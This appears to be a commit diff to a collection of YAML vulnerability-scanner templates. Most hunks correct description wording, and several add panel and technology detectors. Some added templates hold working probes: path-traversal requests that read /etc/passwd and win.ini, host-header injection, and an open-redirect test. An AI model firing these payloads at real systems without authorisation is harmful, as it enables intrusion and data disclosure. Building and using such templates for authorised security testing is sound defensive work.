View File

@ -4,7 +4,7 @@ info:
author: andysvints
severity: high
tags: glpi,default-login
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled.
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
requests:

View File

@ -4,7 +4,7 @@ info:
name: E-mail service detector
author: binaryfigments
severity: info
description: Check the email service or spamfilter that is used for a domain.
description: Check the email service or spam filter that is used for a domain.
tags: dns
dns:

View File

@ -0,0 +1,23 @@
id: strapi-panel
info:
name: Strapi Login Panel
author: idealphase
severity: info
tags: panel,strapi
requests:
- method: GET
path:
- '{{BaseURL}}/admin/auth/login'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Strapi Admin</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: watchguard-panel
info:
name: Watchguard Panel
author: ahmetpergamum
severity: info
reference: https://www.exploit-db.com/ghdb/7008
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/sslvpn_logon.shtml'
matchers-condition: and
matchers:
- type: word
words:
- '<title>User Authentication'
- 'WatchGuard Technologies'
condition: or
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: yarn lock file disclosure
author: oppsec
severity: info
description: yarn.lock is a file which store all exactly versions of each dependency were installed.
description: The yarn.lock file stores the versions of each Yarn dependency installed.
tags: exposure
requests:

View File

@ -3,7 +3,7 @@ info:
name: iis-shortname
author: nodauf
severity: info
description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~.
description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~.
tags: fuzz
reference:

View File

@ -2,7 +2,7 @@ id: kevinlab-device-detect
info:
name: KevinLAB Devices Detection
description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.
description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control.
author: gy741
severity: info
tags: iot

View File

@ -4,7 +4,7 @@ info:
name: XP Webcam Viewer Page
author: aashiq
severity: medium
description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body
description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body.
tags: webcam,iot
requests:
@ -23,4 +23,4 @@ requests:
words:
- "Please provide a valid username/password to access this server."
part: body
negative: true
negative: true

View File

@ -3,7 +3,7 @@ id: google-floc-disabled
info:
name: Google FLoC Disabled
author: geeknik
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
description: The detected website has decided to explicilty exclude itself from Google FLoC tracking.
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
severity: info
tags: google,floc,misc

View File

@ -4,8 +4,8 @@ info:
name: Joomla htaccess file disclosure
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
tags: misc
description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc.
tags: misc,joomla
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
name: Joomla manifest file disclosure
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
tags: misc
description: joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths.
tags: misc,joomla
requests:
- method: GET

View File

@ -4,7 +4,7 @@ info:
name: Moodle Changelog File
author: oppsec
severity: info
description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version.
description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version.
tags: misc
requests:

View File

@ -5,17 +5,21 @@ info:
author: Dheerajmadhukar
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
reference:
- https://hackerone.com/reports/672243
- https://twitter.com/XHackerx007/status/1435139576314671105
tags: aem
requests:
- method: GET
path:
- "{{BaseURL}}/groovyconsole"
- "{{BaseURL}}/etc/groovyconsole.html"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@ -25,6 +29,7 @@ requests:
- "Groovy Web Console"
part: body
condition: and
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
author: DhiyaneshDk
name: AEM UserInfo Servlet
severity: info
description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
tags: aem
@ -28,4 +28,4 @@ requests:
- type: word
part: header
words:
- 'application/json'
- 'application/json'

View File

@ -4,7 +4,7 @@ info:
name: ITMS-Misconfigured
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
description: Detection of misconfigured ServiceNow ITSM instances.
reference:
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -4,7 +4,7 @@ info:
name: HTTP Missing Security Headers
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
severity: info
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
tags: misconfig,generic
requests:
@ -124,4 +124,4 @@ requests:
- type: regex
name: access-control-allow-headers
regex:
- "(?i)access-control-allow-headers"
- "(?i)access-control-allow-headers"

View File

@ -2,7 +2,7 @@ id: laravel-debug-enabled
info:
name: Laravel Debug Enabled
author: notsoevilweasel
description: Laravel with APP_DEBUG set to true prone to showing verbose errors.
description: Laravel with APP_DEBUG set to true is prone to show verbose errors.
severity: medium
tags: debug,laravel,misconfig
@ -19,4 +19,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -0,0 +1,28 @@
id: nextcloud-install
info:
name: Nextcloud Exposed Installation
author: skeltavik
severity: high
tags: tech,nextcloud,storage
reference: https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<fieldset id="adminaccount"><legend>Create an <strong>admin account</strong></legend>'
- '<legend><a id="showAdvanced" tabindex="0" href="#">Storage &amp; database'
condition: and
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: medium
tags: network,ssh,openssh
description: SSHv1 is a deprecated and have known cryptographic issues.
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: info
tags: network,mysql,bruteforce,db
description: MySQL instance with enabled native password support prone vulnerable for password brute-force attack.
description: MySQL instance with enabled native password support is prone to password brute-force attacks.
network:
- host:

View File

@ -5,7 +5,7 @@ info:
author: iamthefrogy
severity: low
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210

View File

@ -0,0 +1,24 @@
id: daybyday-detect
info:
name: DaybydayCRM Detect
author: pikpikcu
severity: info
tags: tech,daybyday
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Daybyday - Login</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: eg-manager-detect
info:
name: eG Manager Detect
author: pikpikcu
severity: info
tags: tech,eg
requests:
- method: GET
path:
- "{{BaseURL}}/final/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title> eG Innovations, Inc.</title>"
- "eG Innovations, Inc. All Rights Reserved"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: iplanet-web-server
info:
name: Detect iPlanet Webserver Detection
author: pussycat0x
severity: info
tags: tech
additional-fields:
fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iPlanet"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: nextcloud-detect
info:
name: Nextcloud Detect
author: skeltavik
severity: info
description: Detects Nextcloud
tags: tech,nextcloud,storage
reference: https://nextcloud.com
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
- '{{BaseURL}}/nextcloud/index.php/login'
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'var nc_lastLogin'

View File

@ -0,0 +1,32 @@
id: host-header-injection
info:
name: Host Header Injection
author: princechaddha
severity: info
description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input.
reference:
- https://portswigger.net/web-security/host-header
- https://portswigger.net/web-security/host-header/exploiting
- https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/
tags: hostheader-injection,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: word
words:
- '{{randstr}}.tld'
part: body
condition: and
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: Open URL redirect detection
author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
severity: low
description: A user-controlled input redirect users to an external website.
description: A user-controlled input redirects users to an external website.
tags: redirect,generic
requests:

View File

@ -4,7 +4,7 @@ info:
name: CouchDB Admin Party
author: organiccrap
severity: high
description: Requests made against CouchDB is done in the context of an admin user.
description: Requests made against CouchDB are done in the context of an admin user.
tags: couchdb
requests:

View File

@ -4,7 +4,7 @@ info:
name: EyeLock nano NXT 3.5 - Local File Disclosure
author: geeknik
severity: high
description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
tags: iot,lfi,eyelock

View File

@ -0,0 +1,28 @@
id: gsoap-lfi
info:
name: gSOAP 2.8 - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47653
tags: gsoap,lfi
requests:
- raw:
- |
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,19 @@
id: homeautomation-v3-openredirect
info:
name: HomeAutomation v3.3.2 Open Redirect
author: 0x_Akoko
severity: medium
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
tags: iot,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -4,7 +4,7 @@ info:
name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account
author: gy741
severity: critical
description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
tags: kevinlab

View File

@ -4,7 +4,7 @@ info:
name: KevinLAB HEMS Undocumented Backdoor Account
author: gy741
severity: critical
description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
tags: kevinlab,default-login,backdoor
@ -38,4 +38,4 @@ requests:
- type: word
words:
- 'PHPSESSID'
part: header
part: header

View File

@ -0,0 +1,27 @@
id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Path Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/49744
tags: minimouse,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200v1 Router Authentication Bypass
author: gy741
severity: high
description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”).
description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”).
reference:
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1

View File

@ -0,0 +1,27 @@
id: openvpn-hhi
info:
name: OpenVPN Host Header Injection
author: twitter.com/Dheerajmadhukar
severity: info
tags: openvpn,hostheader-injection
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{randstr}}.tld
matchers-condition: and
matchers:
- type: word
words:
- "https://{{randstr}}.tld/__session_start__/"
- "openvpn_sess"
part: header
condition: and
- type: status
status:
- 302

View File

@ -4,7 +4,7 @@ info:
name: sar2html 3.2.1 - 'plot' Remote Code Execution
author: gy741
severity: critical
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
reference:
- https://www.exploit-db.com/exploits/49344
tags: sar2html,rce,oob

View File

@ -4,7 +4,7 @@ info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0,ipanda
severity: high
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference:
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
@ -31,4 +31,4 @@ requests:
- type: word
words:
- "X-Application-Context"
part: header
part: header

View File

@ -3,11 +3,11 @@ id: azkaban-workflow
info:
name: Azkaban Security Checks
author: pdteam
description: A simple workflow that runs all azkaban related nuclei templates on a given target.
description: A simple workflow that runs all Azkaban related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/azkaban-web-client.yaml
subtemplates:
- template: default-logins/azkaban/azkaban-web-client-default-creds.yaml
- template: default-logins/azkaban/azkaban-web-client-default-creds.yaml

View File

@ -3,7 +3,7 @@ id: bigip-workflow
info:
name: F5 BIG-IP Security Checks
author: dwisiswant0
description: A simple workflow that runs all Bigip related nuclei templates on a given target.
description: A simple workflow that runs all BigIP related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
@ -14,4 +14,4 @@ workflows:
- template: technologies/bigip-config-utility-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-5902.yaml
- template: cves/2020/CVE-2020-5902.yaml

View File

@ -3,10 +3,10 @@ id: lucee-workflow
info:
name: Lucee Detection Workflow
author: geeknik,dhiyaneshDk
description: A simple workflow that runs all Lucee related nuclei templates on given target.
description: A simple workflow that runs all Lucee related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/lucee-detect.yaml
subtemplates:
- tags: lucee
- tags: lucee

View File

@ -1,9 +1,9 @@
id: springboot-workflow
info:
name: Springboot Security Checks
name: Spring Boot Security Checks
author: dwisiswant0
description: A simple workflow that runs all springboot related nuclei templates on a given target.
description: A simple workflow that runs all Spring Boot related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
@ -13,4 +13,4 @@ workflows:
- template: technologies/springboot-actuator.yaml
subtemplates:
- tags: springboot
- tags: springboot

View File

@ -3,10 +3,10 @@ id: worksite-takeover-workflow
info:
name: Worksite Takeover Workflow
author: pdteam
description: A simple workflow that runs DNS based detection to filter hosts runnng worksite and do further HTTP based check to confirm takeover.
description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover.
reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites
workflows:
- template: dns/worksites-detection.yaml
subtemplates:
- template: takeovers/worksites-takeover.yaml
- template: takeovers/worksites-takeover.yaml